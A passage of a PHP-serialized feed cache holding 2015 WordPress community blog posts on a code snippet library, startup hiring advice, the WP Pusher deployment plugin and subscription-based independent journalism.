+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"WPTavern: How a Crowdsourced Code Snippet Library Can Boost Your Open Source Project\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37151\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"http://wptavern.com/how-a-crowdsourced-code-snippet-library-can-boost-your-open-source-project\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4387:\"<p>Roughly one year ago this month Pippin Williamson made the first commit to Easy Digital Download’s “<a href=\"https://github.com/easydigitaldownloads/library\" target=\"_blank\">Library</a>” repository on GitHub. He created the library to be a community-maintained repository of code snippets that modify the default behavior of Easy Digital Downloads.</p>\n<p>So far the library has received 113 commits from eight contributors, which has resulted in more than sixty code snippets available to users and developers. The snippets cover everything from modifying the checkout experience to customizing the plugin’s email notifications.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/edd-code-snippet-library.png\" rel=\"prettyphoto[37151]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/edd-code-snippet-library.png?resize=1025%2C951\" alt=\"edd-code-snippet-library\" class=\"aligncenter size-full wp-image-38381\" /></a></p>\n<p>With more than half a million downloads on <a href=\"https://wordpress.org/plugins/easy-digital-downloads/\" target=\"_blank\">WordPress.org</a> and 150+ free and commercial <a href=\"https://easydigitaldownloads.com/extensions/\" target=\"_blank\">extensions</a>, Easy Digital Downloads has a large community of developers who work with the software every day.</p>\n<p>Williamson said that having the ability to share snippets for modifying EDD behavior has been hugely useful for the project. He only approves solid, tested code but in most cases the snippets have been submitted by the EDD team. Managing the repository hardly costs any time at all, “a few minutes per week at max,” he said.</p>\n<p>The benefits of hosting a community-maintained repository of code snippets far outweigh the minimal time required to maintain it. “The biggest problem it has is humans: we tend to forget to put snippets up a lot of times,” Williamson said. He identified three key areas where the library benefits the project:</p>\n<ul>\n<li>It’s a resource for the support team.</li>\n<li>It’s a source of examples for people wanting to customize behavior.</li>\n<li>It provides live testing (similar to add-on plugins) for potential features to add to core.</li>\n</ul>\n<p>The most common way that snippets are added to the EDD library is through the support staff. “We write code snippets for customers while helping with support tickets and then we put the snippet in the library,” Williamson said.</p>\n<p>He hasn’t seen any WordPress-based open source projects or products doing anything similar but thinks that others could gain some value from implementing a library. GenerateWP might be the closest example of a site attempting something similar for snippets that extend WordPress core, with its new user <a href=\"http://wptavern.com/generatewp-introduces-wordpress-custom-code-snippets\" target=\"_blank\">code library feature</a>. However, this doesn’t have the collaborative benefits of hosting the library on GitHub.</p>\n<p>Larger WordPress projects like the Pods Framework, Gravity Forms, WooCommerce, BuddyPress, Jetpack, etc., are prime candidates that might benefit from a library of tested snippets. Of course, it helps that the base EDD plugin is free and open source. A 100% commercial project may not fare as well with a crowdsourced snippet library.</p>\n<p>Easy Digital Download is well known for being extensible and developer-friendly. Over the past two years <a href=\"http://wptavern.com/pippin-williamson-on-building-a-community-around-your-open-source-project\" target=\"_blank\">Williamson built a community of contributors</a> 120+ strong and found that extensibility has a direct correlation to profitability. The code snippet library is undoubtedly a valuable investment toward helping developers extend the base EDD plugin.</p>\n<p>Could your open source project or product benefit from a community-maintained library of code snippets? A snippet library can keep developers from having to reinvent the wheel when performing common modifications. It also provides a tested resource of code samples for those who are just getting started extending your project. If Williamson’s experience is any proof, then the few minutes per week spent on a snippets library can pay off with a big boost for the community surrounding your project.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 20:12:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Matt: Advice and Fallacies\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44648\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"http://ma.tt/2015/02/advice-and-fallacies/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5955:\"<p>One of the toughest things in business is when you get well-meaning advice from advisors, investors, or friends of the company who are valuable but might hold some ideas or ways of approaching problems that just aren’t applicable to your particular company or situation. They might be right most of the time, and it might have worked for them in the past to build a huge success, but it doesn’t mean it’s right for you, right now.</p>\n<p>This is especially a struggle for Automattic because so much of what we do is deliberately different from companies that have come before us. The below is a sensitive-info-scrubbed version of a comment I made on an <a href=\"http://p2theme.com/\">internal P2</a> in response to someone who had met with a close friend of the company who had said we should “hire more business people, and more people like <em>so-and-so</em>, who have a background in and passion for data analysis and structure. He also shared his ideas about what the additional business hires could be responsible for, such as P&L responsibilities for specific products.” The person he had talked to was asking why we weren’t following that advice.</p>\n<p>The first part was easy, because <em>so-and-so</em> was actually leading hiring for a position around data and the early results were going well. The rest I ended up writing more about, which follows. It was only meant for internal consumption, so read it as such, but I got enough requests to share the comment publicly that I wanted to clean it up and release it for y’all.</p>\n<blockquote><p>On the “more biz people + P&L” side, it’s an area we disagree.</p>\n<p>We’ve had more “business people” in the past, and found it just didn’t move the needle in the same way that investing on the support, engineering, and design side did. They also tended to generate more meetings and work for other people than was commensurate for their contributions.</p>\n<p>We’ve also experimented with giving leads P&L responsibility for products and groups, but ultimately it was awkward because we don’t really want leads or teams focused on the loss or costs of what they’re doing — we just want to grow our core metrics and revenue in a healthy and accelerating way, and let Ops and myself worry about overall profit or loss for the company, costs of people and services, capital requirements, etc. We’re still at a stage where our primary goals are investing in growth and product excellence, I wouldn’t want a P&L concern to be a distraction from that, and that also takes us into the territory of different teams having “headcounts” of people they can hire for the year, or budgets set ahead of time and that they’ll lose if they don’t use, zero-sum accounting between teams and more balkanization you often see in larger organizations. When anyone thinks about P&L at Automattic, I want it to be holistically and with a long-term view, not for a single team or product.</p>\n<p>It gets backs to the fallacy we talked about and agreed to avoid at the [WordPress.com leads] meetup, which is the business equivalent of <a href=\"http://en.wikipedia.org/wiki/Great_Man_theory\" rel=\"nofollow\">Great Man Theory</a>: the idea that a deficiency in the business or product will be solved by hiring someone senior to be in charge of that thing. Example: Automattic is bad at marketing, we should hire a CMO. (99% of the time when this is suggested it means an external person, because if anyone internal was good the problem wouldn’t exist.) It’s an easy thing for anyone to fall into, you can see it in [a recent internal thread].</p>\n<p>This must work sometimes, because it seems to be a near-universal affliction of VCs on startup boards. It also is a little bit of a <a href=\"http://bikeshed.com/\" rel=\"nofollow\">bikeshed</a>, because while it can be difficult to understand or feel like you can have an influence on something fundamental to the product, like say the signup flow, most VCs have large professional networks and can have long and vigorous discussions talking about potential people who are executives in a given area and their first or second degree connections to them. Of course, like many of us, VCs are consumers of tech media which tends to ascribe all the success of an organization to a single person (like Sheryl Sandberg for Facebook not falling apart, or Adam Bain for revenue at Twitter). However often the problem has root causes more fundamental than a single person could shift.</p>\n<p>I subscribe to a more environment-driven approach, that if you break down a problem into its component parts you can address them individually, often with relatively simple next steps, and build things from the ground up, rather than the top down. If you can’t do that, then it’s best to be candid that the area is not a priority and make sure that’s in line with what you’re focusing on instead. In this process leaders will emerge or if the effort matures to a point where one joins as a new hire he or she will have the resources, groundwork, and environment to succeed.</p></blockquote>\n<p><strong>So in summary: always go back to first principles of decisions.</strong> Hires are seldom panaceas. Someone being successful in a role at another company doesn’t mean they actually did the work, or were the cause of the success. If there’s an area you’re weak, try to figure out the root causes of why you’re weak, and where possible try to improve the environment that creates the problem before pinning the turnaround on a “Jesus hire.” When you improve the environment it makes it much more likely a new external hire will do well. The majority of success or failure is a result of the environment, at least as much as the individuals involved.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 07:57:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"WPTavern: WP Pusher Aims to Provide Pain-Free Deployment of WordPress Themes and Plugins from GitHub\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38339\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:110:\"http://wptavern.com/wp-pusher-aims-to-provide-pain-free-deployment-of-wordpress-themes-and-plugins-from-github\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6728:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher.png\" rel=\"prettyphoto[38339]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher.png?resize=680%2C312\" alt=\"wp-pusher\" class=\"aligncenter size-full wp-image-38342\" /></a></p>\n<p>If you create plugins and themes for clients and host them on GitHub, then you may have encountered the hassle of having to move those files over to your client’s installation. On super cheap hosting packages, where SSH access is not an option, this process inevitably requires manually copying files over via FTP.</p>\n<p>This is the problem that Danish developer <a href=\"http://petersuhm.com/\" target=\"_blank\">Peter Suhm</a> aims to solve with his new <a href=\"https://wppusher.com/\" target=\"_blank\">WP Pusher</a> product. The plugin aims to bring pain-free deployment of WordPress themes and plugins directly from GitHub and Bitbucket.</p>\n<p>“If you happen to be an actual developer, I guess you have a few preferences as to how you manage and deploy your code,” Suhm said. “I’m talking about stuff like version control and automated deployment scripts. Good luck with that on your clients’ cheap-ass shared hosting account.”</p>\n<p>Suhm developed WP Pusher with the vast majority of cheaply-hosted WordPress sites in mind. Additionally, he wanted to eliminate some of the hangups with more expensive hosts. “Even if you are running a shiny new VPS and have SSH access, Git installed and you think all is well, soon you’ll realize other weird things,” he said. “You can’t have symlinks in your /plugins folder just to mention one.” WP Pusher gets around these limitations via a simple plugin that does not require Git or SSH.</p>\n<h3>How Does WP Pusher Work?</h3>\n<p>Once installed, WP Pusher allows you to install and manage all of your GitHub or Bitbucket-hosted plugins in one central dashboard in the admin. Enabling the Push-to-Deploy feature will have your code update itself automatically every time you push to GitHub or Bitbucket.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/manage-wp-pusher-themes.png\" rel=\"prettyphoto[38339]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/manage-wp-pusher-themes.png?resize=1025%2C202\" alt=\"manage-wp-pusher-themes\" class=\"aligncenter size-full wp-image-38352\" /></a></p>\n<p>The plugin supports private repositories in its free edition and includes support for branches in the <a href=\"https://wppusher.com/#licenses\" target=\"_blank\">Pro version</a>.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher-install-plugin.png\" rel=\"prettyphoto[38339]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher-install-plugin.png?resize=1025%2C651\" alt=\"wp-pusher-install-plugin\" class=\"aligncenter size-full wp-image-38353\" /></a></p>\n<p>WP Pusher is essentially an extension of the built-in auto updater in WordPress, which Suhm explained in the plugin’s release <a href=\"http://blog.wppusher.com/pain-of-wordpress-development/\" target=\"_blank\">post</a>:</p>\n<blockquote><p>After a lot of prototyping, and hacking around with the WordPress core, we came up with a smart solution. By utilizing the WordPress core upgrader classes, we could solve the problem in a really clean way. </p>\n<p>Since WordPress already knows how to pull stuff from a remote source and install it, we realized that by working together with WordPress, instead of just throwing random automated SSH and FTP scripts at the server, we could just have WordPress do the work for us -with a lot of tweaking of course. In the end, our solution doesn’t do anything that is not native to WordPress. It’s all core functionality.</p></blockquote>\n<p>WP Pusher does everything in the plugin and does not require shell access. It communicates with GitHub via a token stored on your server and operates using WordPress’ core updater capabilities.</p>\n<h3>Different Approaches to Managing WordPress Projects with Git</h3>\n<p>In order to use WP Pusher, each GitHub-hosted plugin and/or theme will need to be in its own repository. While beta testing WP Pusher, Suhm found that developers have <a href=\"http://blog.wppusher.com/managing-wordpress-projects-with-git/\" target=\"_blank\">differences in how they manage WordPress projects with Git</a>. The most common one he’s encountered is <em>one installation, one repository</em>, where the entire WordPress installation, including themes and plugins, is under Git control. Suhm believes that this approach is fundamentally broken, given that it requires you to keep a lot of 3rd party code under version control.</p>\n<p>WP Pusher operates under a “<em>one package, one repository</em>” approach where each theme or plugin is its own entity. This method also offers the advantage of being able to share theme/plugin code across multiple projects.</p>\n<p>“WordPress relies heavily on the auto updater, which would make your version control a mess,” Suhm explained. “If you do have something that is more enterprise than most WordPress setups, you should consider a custom setup that allows better for version control of core. Packages should still, in my opinion, each have their own repositories, since they are logically their own entities.”</p>\n<p>WP Pusher is structured around this approach for managing WordPress projects with Git. You may need to restructure some of your repositories if you want to be able to use the plugin.</p>\n<p>The free version offers unlimited themes and plugins, unlimited repositories, and support for both GitHub and Bitbucket. It does not, however, include email support. WP Pusher is compatible with WordPress multisite and will show up in the network admin when activated. It doesn’t currently support Composer but Suhm is <a href=\"https://twitter.com/WP_Pusher/status/558356082960371713\" target=\"_blank\">considering adding it in the future</a>. The plugin is released under the GPLv2 license.</p>\n<p><a href=\"https://wppusher.com/\" target=\"_blank\">WP Pusher</a> offers a unique take on maintaining version control for projects while not forcing WordPress to bend over backwards to provide it in the admin. It leaves the version control to GitHub and/or Bitbucket and uses WordPress simply for deployment.</p>\n<p>Setup is simple and the plugin will work virtually everywhere, even on the cheapest hosting. If you like the idea of maintaining version control on a plugin/theme basis, you can download the WP Pusher plugin for free from the project’s <a href=\"https://wppusher.com/\" target=\"_blank\">website</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 22:32:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Post Status: New journalism\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://poststatus.com/?p=8311\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"https://poststatus.com/new-journalism/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:13584:\"<p>Have you heard of Andrew Sullivan? He’s the man behind The Dish — a blog that helped break new ground on blog monetization through membership fees.</p>\n<p><a href=\"http://dish.andrewsullivan.com/2015/01/31/a-note-to-my-readers/\">He quit blogging</a>, and therefore the media world declared blogging dead (again). Sullivan leaving and the posts that have come from it have caused me to think about blogging and journalism in its current and changing state. I think we’re in the second act of what I’m pompously calling <em>new journalism</em>.</p>\n<h3>Blogging is so (not) dead</h3>\n<p>Seemingly everyone in media weighed in on Sullivan’s departure, from <a href=\"http://www.buzzfeed.com/bensmith/this-is-my-blog\">Ben Smith</a> at Buzzfeed to <a href=\"http://www.vox.com/2015/1/30/7948091/andrew-sullivan-leaving-blogging\">Ezra Klein</a> at Vox. My favorite (until today) was Mathew Ingram’s <a href=\"https://gigaom.com/2015/01/31/blogging-is-very-much-alive-we-just-call-it-something-else-now/\">take at Gigaom</a>, which mostly defended the blog.</p>\n<p>But the best of the bunch goes to former Automattician and current independent tech journalist Ben Thompson. Ben runs <a href=\"http://stratechery.com/\">Stratechery</a>, a blog that has a very similar model to The Dish (and my own), where he makes money from subscribers who get extra members-only content.</p>\n<p>I have followed Ben’s work closely. I was quite keen to see how his model would work for him, and it has. Nevertheless, I almost fully agree with Ben’s take on what Sullivan’s model and departure mean:</p>\n<blockquote><p>It turns out, though, that there are more business models than simply advertising, as Sullivan himself sought to show. Sullivan was, for the last two years, supported by reader subscriptions to the tune of <a href=\"https://gigaom.com/2014/10/10/andrew-sullivans-daily-dish-sees-new-signups-fall-but-revenue-holding-steady-at-about-1m/\">nearly one million dollars a year</a>, and while many were skeptical of Sullivan’s efforts when he started, his ability to raise money shouldn’t have been a surprise: his is a singular voice – to put it in economic terms, Sullivan’s writing had a low <a href=\"http://en.wikipedia.org/wiki/Elasticity_of_substitution\">elasticity of substitution</a> – so people were happy to pay for something they couldn’t get anywhere else.</p></blockquote>\n<p>Elasticity of substitution may be my new favorite phrase. And in that concept, I think we find the important key to viability. What are we valuing in websites? For me, it’s individual voices.</p>\n<p>A bit more from Ben’s post:</p>\n<blockquote><p>But Sullivan did have a viable business, and it scaled wonderfully: it cost him the same amount of both time and money to serve 1,000 subscribers as it would have to serve 100,000, or 1 million, and he didn’t need to change a thing about himself or his content to do it. No, it’s not scale that is the problem, but rather <em>reach.</em></p>\n<p>I am, of course, acutely aware that there is a tradeoff when it comes to the subscription business model: by making something scarce, and worth paying for, you are by definition limiting your number of readers.<span> </span>Stratechery, though, serves a niche, and <a href=\"http://stratechery.com/2015/niches-problem-subscription-services/\">niches are best served</a> by making more from customers who really care than from milking pennies from everyone.</p></blockquote>\n<p>For a writer, it is a difficult mind-shift to focus on subscribers after years of focusing on reach. But I do think a subscriber model, or more likely a hybrid subscriber model, is perhaps one of the most viable routes for sustainable journalism that we have today.</p>\n<h3>New blogging mediums</h3>\n<p>Of additional interest to all of these “blogging is dead” posts, is how the writers define blogs and the mediums for them.</p>\n<p>Ben really narrows the definition of a blog.</p>\n<blockquote><p>A big problem with this entire discussion is that there really isn’t a widely agreed-upon definition of what a blog is, thanks in part to the rise of sites like TechCrunch that ran on WordPress and presented posts in reverse-chronological order and so, at least in the beginning, were called “blogs”; add to that the thinly-disguised PR-channels known as “company blogs” and it’s easy to get confused.</p>\n<p>And so, to be clear, when I speak of the “blog” I am referring to a regularly-updated site that is owned-and-operated by an individual (there is, of course, the “group blog,” but it too has a clearly-defined set of authors). And there, in that definition, is the reason why, despite the great unbundling, the blog has not and will not die: is is the only communications tool, in contrast to every other social service, that is <em>owned</em> by the author; to say someone follows a blog is to say someone follows a <em>person.</em></p></blockquote>\n<p>This is probably the single argument I (partially) disagree with. I actually believe that a blog is just that: <em>a web log</em>. I think it’s perfectly fine to consider Twitter, Facebook, & Instagram new mediums for blogging — at least in the sense of the traditional <em>web log</em> definition. They are just for a different form of blogging: short form, temporary, and a viable replacement for the “10 to 15″ daily update style of posts many old school bloggers previously put on their primary “blogs”.</p>\n<p>Other than someone abusing these mediums — for instance, Marc Andreessen’s tweet-storms — our WordPress (or other software) blogs are still where our more permanent thoughts go. And fortunately, as Ben notes, we have these short-form mediums as free marketing channels for our actual blogs and more serious thoughts.</p>\n<p>Ben also hesitates to consider multi-author sites as blogs. I disagree here as well. Perhaps publications aren’t blogs as a whole, but within TechCrunch or The New York Times, individuals rise up with their own unique voices, and those singular feeds are, in my opinion, blogs of their own — whether or not they are fully siloed within the publication. I can follow an author on Twitter and essentially get their blog feed through their Twitter links, even if the site itself doesn’t differentiate their posts from anyone else’s.</p>\n<p>So Ben has helped me establish a new mental constraint for defining a blog: <strong>a blog is a highly individual thing</strong>. I have never truly considered this before, but it makes sense. I’ve always been most attracted to publications where the voice behind the writing is strong — where I know who is writing a post whether I see the byline or not.</p>\n<h3>Publishing containers</h3>\n<p>The New York Times, TechCrunch, Politico and BuzzFeed: these are containers. They may have some over-arching styles that most of their writers follow, but we still get to know individuals in these publications. I know David Carr’s voice at The New York Times; I know Alexia Tsotsis’ voice at TechCrunch; I know Mike Allen’s voice at Politico; and I know Ben Smith’s voice at BuzzFeed.</p>\n<p>One thing we’ve seen happen in a wake of <em>new journalism</em> is that a voice gets too big for the container, and the voice splits. Nate Silver left The New York Times. Ezra Klein left The Washington Post. Interestingly, I think both of these guys lost their voices a bit when they created their own containers.</p>\n<p>Andrew Sullivan is a great example of a big voice within publishing containers. Before he went independent, he was a huge voice at The Atlantic and The Daily Beast. He was apparently responsible for <a href=\"http://www.forbes.com/sites/jeffbercovici/2011/05/03/losing-andrew-sullivan-didnt-hurt-the-atlantics-traffic/\">up to a quarter</a> of all traffic to The Atlantic before he left.</p>\n<p>For a publisher, this should be both exhilarating and terrifying. The voice within your publication (Sullivan) gets outstanding results, but you also run the risk of the voice leaving; if the voice is bigger than the container, that could be really really bad.</p>\n<h3>We need new tools for a new kind of publishing container</h3>\n<p>Journalists are leaving big publishing containers and going independent for a variety of reasons, but I believe one is pretty clear: money.</p>\n<p>A niche publisher like Ben Thompson can make well into six-figures running his own publication. Ben is a talented and knowledgeable writer, but I don’t think it would be easy for him to make the kind of money he’s making at Stratechery if he were writing for a traditional publication.</p>\n<p>Ben cites the ease of use of tools like WordPress and Stripe as reasons to be optimistic that the independent subscription model can work:</p>\n<blockquote><p>While WordPress has long been an effective free option for managing the content-side of blogging, only recently are there useful tools for managing the business-side. First and foremost amongst these is Stripe which, for the first time makes managing subscription-payments simple and straight-forward. However, there are still holes, particularly when it comes to actually managing membership lists and communities</p></blockquote>\n<p>I agree that it’s easier than before, but I wouldn’t say it’s simple. I’ve spent a great deal of time to make Post Status work behind the scenes, and I don’t think it’s perfect by any means. Is it cheap compared to million dollar big-publisher platforms? Yes. Is it cheap for a solo-journalist? Not at all.</p>\n<p>I think there is a tremendous opportunity here: there is room to create new publishing containers (I’m not sure if this should be a tool or a network) that lower the technical barrier to entry but also enable independent, subscription-based journalism.</p>\n<p>Big media companies remove the need to manage the business and technical side for journalists. Meanwhile, those of us that are attempting our own thing are all reinventing the wheel a bit.</p>\n<p>Ben and I use some of the same tools — WordPress and Stripe — but what if there was a more structured container for those seeking independence and someone to help them take care of the non-content aspects? What if that same tool had its own network effect?</p>\n<h3>Who is in position to be a new kind of container?</h3>\n<p>What existing networks are in position to offer this kind of tool? WordPress.com is one. Medium is another.</p>\n<p>I envision a tool (publishing platform) where independent journalists can do a few things:</p>\n<ul>\n<li>Maintain their own audience (be a part of a network, but be their own voice and publication)</li>\n<li>Own their own brand (custom themes/styles, unique domain)</li>\n<li>Offer subscription options to readers without managing the tech</li>\n</ul>\n<p>If I were Ev Williams or Matt Mullenweg, I’d be working on a way to be the next container for great, <em>sustainable</em> journalism. And hosted networks have a unique advantage: they can offer discovery for new or lesser-known authors. Unless <a href=\"https://poststatus.com/notes/recommendation-engine-independent-wordpress-blogs/\">self-hosted options figure that part out</a>.</p>\n<p>As a publisher on the WordPress.org side of things, I don’t think the perfect tool exists yet either. Fortunately I’m able to build most of what I need. But Ben is right that managing membership lists and communities with WordPress is still hard. Syncing the membership list and the email list (delivery mechanism) is hard too.</p>\n<p>While I don’t think the perfect self-hosted tools exist quite yet, I believe it’s just a matter of time. But even the best self-hosted tool will require that the journalist also manage the business elements; therefore I think there will always be room for a hosted tool.</p>\n<p>I think this could be an excellent business vertical for a publishing tool like <a href=\"http://wordpress.com\">WordPress.com</a> or <a href=\"http://medium.com\">Medium</a>.</p>\n<h3>New journalism</h3>\n<p>I’ve used the words <em>journalism</em> and <em>blogging</em> synonymously throughout this post. I don’t think all bloggers are journalists, but I do think all journalists are bloggers. Blogging isn’t dead. I think it’s just leaving adolescence.</p>\n<p>Journalists won’t need big media to back their efforts. They’ll be able to use a blend of mediums (Twitter, Instagram, Youtube, etc) to funnel traffic to their main “blog” — or primary domain — where they can actually make money by attracting loyal subscribers willing to pay for high-value content.</p>\n<p>The formula for making money will change. The key for successful independent journalism won’t be about being first, or dominating search, or pageview quotas. Too many in big media have ignored that <em>elasticity of substitution</em> measurement Ben highlights.</p>\n<p>Journalism is changing, and I agree with Ben Thompson that “The Daily Dish will in the long run be remembered not as the last of a dying breed but as the pioneer of a new, sustainable journalism.”</p>\n<p>Those journalists that can create what others cannot will have a formula for publishing success, and soon enough the tools will catch up to allow them to do what they do best: create great content.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 22:21:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: Sprig: A WordPress Starter Theme that Features the Twig Templating 